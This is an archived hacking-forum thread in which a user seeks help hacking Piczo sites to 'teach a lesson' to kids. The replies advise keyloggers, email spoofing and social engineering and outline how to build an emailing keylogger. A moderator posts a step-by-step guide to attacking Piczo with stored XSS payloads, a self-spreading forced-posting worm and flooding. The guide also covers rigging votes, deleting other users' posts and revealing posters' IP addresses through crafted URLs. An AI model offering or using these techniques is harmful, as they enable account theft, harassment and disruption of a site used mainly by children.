PDA

View Full Version : Piczo



Addi
04-03-2006, 05:27 PM
Hi Guys,

I really need to hack a few piczo sites not because im a sad lonley noob or anything lol just some serious matters if u know anything which may help please pm me a link or post on here.

many thanks guys and girls:rolleyes:

Addi

Ezekiel
04-03-2006, 06:22 PM
Hi Guys,

I really need to hack a few piczo sites not because im a sad lonley noob or anything lol just some serious matters if u know anything which may help please pm me a link or post on here.

many thanks guys and girls:rolleyes:

Addi

Even just wanting to hack those lame sites makes you a n00b, so yes, it is because you are a sad lonely n00b. I don't know "piczo", but from a quick google it is another site that allows users to upload and make their own site, either by coding it or using their editor. So why would you think this is ANY different to "hacking" other sites?


just some serious matters

Oh sure, serious matters... Getting in to some lame site like piczo is really a serious matter isn't it. Why don't you get a life, now that is a more serious matter, or at least stop spamming this forum expecting people to do something you are too lazy or dumb to do yourself. Here's a site that can answer all your questions... http://www.google.com. Or even better, is the ***7 hacking site, http://*27.0.0.*, I believe they have a "click to hack" button to hack piczo and other crappy sites for people too dumb to make their own website. If you really want to get into someone's account, you could have at least looked at the html form used to log in, scanned the ports of the server to see what services are running, found out what http server it is running on (apache/iis), then you could have learned something and wouldn't have had to spam this to us, or could have given us more details to work with than "I need to hack a few piczo sites".

Addi
04-03-2006, 10:14 PM
:eek: m8 im a newbie i dont know to find the sites ports and even when i do i wouldnt know what 2 do with them

no need 2 flame me just give me a site too look on to teach me the real basics or what to serach in google

this is important it aint just no kiddie website on piczo m8, if these sites aint taken offline a breed of dog will be bannd in england forever seems like nothing maybe 2 u but ppl will loose their loved pets and innocent dogs will be put down?

Ezekiel
04-04-2006, 05:16 AM
:eek: m8 im a newbie i dont know to find the sites ports and even when i do i wouldnt know what 2 do with them

no need 2 flame me just give me a site too look on to teach me the real basics or what to serach in google

this is important it aint just no kiddie website on piczo m8, if these sites aint taken offline a breed of dog will be bannd in england forever seems like nothing maybe 2 u but ppl will loose their loved pets and innocent dogs will be put down?

meh, it's your problem, not mine.


it aint just no kiddie website on piczo m8

Uh, yes it is, sites like that are specifically designed for losers who can't make their own website, if they were not a "kiddie website" they would find a real host, not some lame site like piczo. And if you want a bit more respect when posting, don't use words like 2, m8, u and ppl as a replacement for typing with real words. I will tell you now, you will not hack into a big, properly run site like piczo (well at least it looks like it is from 2 seconds googling it). So the only way would be to use a keylogger or social engineering, if you know the email of the admin of the site, some simple email spoofing asking them to "reactivate" their account, or sending them the keylogger could get you the password.

Addi
04-04-2006, 10:10 AM
:D ok thanks for the advice mike, these are kids running this websites.they are about ** and are wanna be gangsters who need to be taught a lesson.

what keylogger is easy to use and will get through firewalls.Pm if you wish mike.

Ezekiel
04-04-2006, 11:55 AM
:D ok thanks for the advice mike, these are kids running this websites.they are about ** and are wanna be gangsters who need to be taught a lesson.

what keylogger is easy to use and will get through firewalls.Pm if you wish mike.

First rule in hacking of how not to get flamed and called a n00b: Don't ask dumb questions like "how do I hack" or ask how to hack to get "revenge on your enemy" or some other lame excuse. I am not going to help someone with this attitude to hacking. We are not just here to solve your problems, and I am not going to possibly do something illegal just to "teach a lesson" to some loser. Hacking can be used for legal or illegal things, I really don't care, it's your own choice. But if you are going to do something illegal, you go and learn yourself, you don't expect people to actually do it for you. If you want a keylogger, have you considered using google?

http://www.google.com/search?hl=en&q=keylogger&btnG=Google+Search

A search for keylogger = 5 million results. And there were at least 5 keyloggers that were free on the first page of results. Even programming your own keylogger is not that difficult, with a medium knowledge of c++, I just finished one that sends by email, all you need to know is the basics of the language (variables, classes, functions etc) and how to use winsock and the windows api, throw in a GetAsyncKeystate function and check for which key was pressed, use winsock to send to a smtp server, and it's finished.

jaboone
01-25-2007, 12:06 AM
Edited by Moonbat - Please read our rules before posting

japa
06-28-2007, 07:40 PM
Edited by Moonbat - Please read our rules before posting

Moonbat
06-28-2007, 08:41 PM
You want help hacking Piczo? Here's a great article.


PICZO HACKS COLLECTION
.:GaMeBoY::HaCkEr:.
**th January 2007

This is basically a list of all the vulnerabilities and possible methods of attack I have found in the Piczo system. Piczo is a social networking site mostly used by children aged **-*7, and is very poorly coded. There are even spelling mistakes in the code! :O
Piczo currently has seven servers.

Most of the ways in which to exploit Piczo involve JavaScript injection and in-url hacking, where the url string is modified, and hence different data is sent to the Piczo servers.

*.A) Comment ***rd xss attacks.
This is probably the biggest threat to Piczo sites at the moment. All comment ***rds are currently vulnerable to cross site scripting, that is, you can post your own code, and it will be executed on the user’s machine when they view the site. I discovered this vulnerability just the other day, but I’m not sure if anyone else knows about it. I heard another guy called ProRatHack was also ‘hacking’ comment ***rds or something :s

So what can we do with xss on Piczo? Well, you could be a lame n00b and use it for making alerts and pop up boxes on the person’s site, but that wouldn’t be too cool. Here’s the code for it anyway if you want to see it:

alert(" the text goes here");

As you can see it’s pretty simple, just define the code type and do what you want. Don’t forget you can string JavaScript commands together with a semi-colon.
You could also use JavaScript to make the person’s comment ***rd frame redirect to another site (think shock sites ;),and you could also affect the parent frame, but I can’t be bothered to explain that now.

Okay, that’s the lame stuff out of the way, think about who normally uses Piczo…logged in Piczo users! And think…they will probably be logged in when they view the comment ***rd…we could redirect them to a cookie stealer and take their session ids sure, but there is an easier and more fun attack we can try…

*.B) Comment ***rd xss attacks – faking
We can post messages as other users, or actually make them automatically post messages when they are viewing the infected comment ***rd. First you have to understand how it works:
http://pic6.piczo.com/go/commenton***rd?cb=62*5256&cbo=*245787&commentername=Santa&text=hello

Piczo comments for comment ***rds get sent to the servers in an url, very insecure. Now of course, we can change the name that is displayed, but that would be too easy and not very fun. Instead, we can make a logged user in Piczo that visits the site get redirected to the url that posts messages, so if you used the window.location command (window.open is not suitable here as most people have pop-up blockers), they would appear to be posting the message, as the server is getting sent a request from their logged in account ;)

So all we have to do is place one infected bit of code into the comment ***rd, and anyone that visits the site will unwittingly post hundreds if not thousands of messages, and because there is no word limit on the comments, you can bomb the Piczo servers with data by doing this, hopefully resulting in a very primitive form of DoS, basically using up all their bandwith, or even all their physical storage capacity.

So the resulting code would look like this:
window.location="http://pic6.piczo.com/go/commenton***rd?cb=62584*5&cbo=**28***&commentername=Santa&text=awwww you were hacked";

Of course, you would need to change the number after pic# (to define the server with the comment ***rd you want to infect), the cb code, and the cbo code. Of course, you could make the other users post the code as well, which would make the code self replicating, and almost impossible to kill. At he moment I’m working on a better fully fledged version of this code, which will scout out other Piczo sites by scanning the friends’ list on the site, and hopefully spreading through all of Piczo &#6*5*4;

2.Piczo ratings system
Okay, you know those little boxes that people put on their sites, to make you vote for them, the type where there is a row of stars and the voting is instant? These are easy to ruin. All you have to do is view source for the page on which the ratings box is, and then search (Ctrl + F) for ‘ratingsForm’, and it should hopefully lead you to something that looks like this:

<form id="ratingsForm*487054**" name="website_*-*0" action="http://pic4.piczo.com/go/ratemysite" method="POST">
<input type="hidden" name="rating_id" value="57752" />
<input type="hidden" name="rating_score" value="*0"/>
<input type="hidden" name="rating_method" value="component">
<input type="hidden" name="elapsed" value="0"/>
</form>

See what it’s doing? It’s sending data to the address ‘http://pic4.piczo.com/go/ratemysite’, and this is what the url would look like with the data affixed:

http://pic4.piczo.com/go/ratemysite?rating_id=57752&rating_score=*0&rating_method=component&elapsed= 0

How easy was that? Lol. So basically, we can change that all we want before it gets sent to the server. We can change ‘rating_score’ to *, and vote for one star in the ratings box, and that url can be used for any ratings box with a little adjustment, all that needs to be changed is that pic# server identifier at the start, and the rating_id, which defines which ratings box to vote for. Also remember to change the ‘elapsed’ value to something like 20 000.

Now, how to vote for this site millions of times? The data telling Piczo whether you have voted for a certain site already is stored in a cookie, silly Piczo. So Just disable cookies in your browser (use the Web Developer extension for Firefox), and go to your voting url. Then just keep re*****ing it to vote multiple times. But that would take long, so download the ‘reload every’ extension for Firefox and open that voting url in about 20 tabs. Then set each tab to reload once every minute &#6*5*4;.

*.Shoutbox ‘hacking’
Shoutboxes are very easy to destroy or ruin. You can delete other people’s posts very easily.

*. Find the url of the shoutbox, as you will need to view the actual generated source code for the shoutbox, so go on the Piczo page with the shoutobx, and view source for it, search for ‘go/shoutbox?sb=’, which should lead you to an url that looks like this (it’s tucked away in some iframe tags):
http://pic6.piczo.com/go/shoutbox?sb=4780*80&sbo=*245787

2. Now that you have that, navigate your browser to it, and you should see only the full shoutbox on your screen. Now, view source again, and scroll down and look for the messages. Each message will have a unique postView number. Now copy down the numbers for the messages you want to delete, and stick them in this url:
(first you need to replace the sb and sbo numbers with the ones from the shoutbox url you just used, and also use the correct pic# server identifier number, same as your shoutbox url from just now)
Put the postView number of the message in the plpid parameter in the url string, now navigate your browser to it, and the message should get deleted &#6*5*4;

http://pic6.piczo.com/go/editpostapproval?dba=y&shout=y&sbo=*245787&sb=4780*80&plpid=46*707**&approvalstatus=delete

*.B)Fun but a bit useless
You still have the shoutbox url from earlier right? The one that looked like
http://pic6.piczo.com/go/shoutbox?sb=4780*80&sbo=*245787 ?
if so, just add ‘&isedit=y’ to the end of the address, so it looks like this:
http://pic6.piczo.com/go/shoutbox?sb=4780*80&sbo=*245787&isedit=y
Now, navigate to the new address. What do you notice? You can see the ip addresses of all the posters and also any messages that have been disapproved or hidden by the actual site owner :P

Also, you can add ‘&showWelcomeMessage=y’ to the end of the url to show the ‘you are logged in’ message.

4. Guestbook ‘hacking’
Guestbooks can be ‘hacked’ using the same method described for the shoutbox trick. If you can’t work out how to modify the method to use it with guestbooks, you don’t deserver to have a computer. You can also use the javascript method, that is:
deletePost(46*72066)
And replace the number with the correct one.

There are many more ways to ruin Piczo but I can’t be bothered to write anymore :D